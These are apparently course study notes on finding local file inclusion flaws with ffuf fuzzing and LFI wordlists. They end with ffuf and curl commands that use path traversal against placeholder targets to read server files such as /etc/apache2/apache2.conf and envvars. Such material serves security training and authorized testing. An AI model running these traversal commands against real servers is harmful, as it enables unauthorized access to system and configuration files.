8.Automated-scanning

Key Takeaways:

• Importance of Manual Testing:

  • Emphasizes that automated scanning is not a replacement for manual testing.

  • Custom payloads and techniques are often required for complex vulnerabilities.

  • Bypassing WAFs and firewalls requires in-depth understanding.

• Fuzzing Parameters:

  • Using ffuf to discover hidden GET/POST parameters.

  • Highlighting that hidden parameters may be less secure.

  • Providing a link to common LFI parameters.

• LFI Wordlists:

  • Using wordlists like LFI-Jhaddix.txt to automate LFI payload testing.

  • Demonstrating how to use ffuf with LFI wordlists.

  • Good explanation of how to verify the wordlists results.

• Fuzzing Server Files:

  • Fuzzing for server webroot paths, configuration files, and log files.

  • Providing links to Linux and Windows webroot wordlists.

  • Demonstrating how to find server configurations and log paths.

  • Good explanation of how to follow file paths, and find needed information.

• LFI Tools:

  • Mentioning popular LFI tools like LFISuite, LFiFreak, and liffy.

  • Acknowledging that many tools are outdated and rely on Python 2.

  • Good advice to test the tools, to see their accuracy.

Additional Considerations:

• Tool Limitations:

  • Automated tools may miss complex vulnerabilities or bypasses.

  • False positives and false negatives are common.

  • Tools need to be updated to be effective.

• Wordlist Selection:

  • Choosing appropriate wordlists is crucial for effective scanning.

  • Custom wordlists may be needed for specific applications.

• WAF Evasion:

  • Automated tools may not be effective against advanced WAFs.

  • Manual testing and payload crafting are often required.

• Ethical Considerations:

  • Automated scanning should only be performed on systems with explicit permission.

  • Avoid causing denial-of-service (DoS) attacks.

• Scripting:

  • Writing custom scripts can be a very effective way to automate the scanning process.

  • Python is a very useful language for this task.

• Regular Expressions:

  • When dealing with large amounts of data from log files, or configuration files, regular expressions are very useful.

# Discovering hidden parameters
ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ \
    -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287  

# Finding LFI vulnerabilities using wordlists
ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ \
    -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287  

# Searching for default web root directories on Linux
ffuf -w /opt/useful/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ \
    -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287  

# Using a custom LFI wordlist
ffuf -w ./LFI-WordList-Linux:FUZZ \
    -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287  

curl (HTTP Request Tool)

A command-line tool for transferring data with URLs, commonly used for making HTTP requests.

Examples:

# Accessing a sensitive configuration file
curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/apache2.conf  

# Extracting environment variables from the server
curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/envvars  

---

Key Points:

• The primary tools used are ffuf for fuzzing and curl for making HTTP requests.

• This guide focuses on Linux-based web servers and file inclusion vulnerabilities.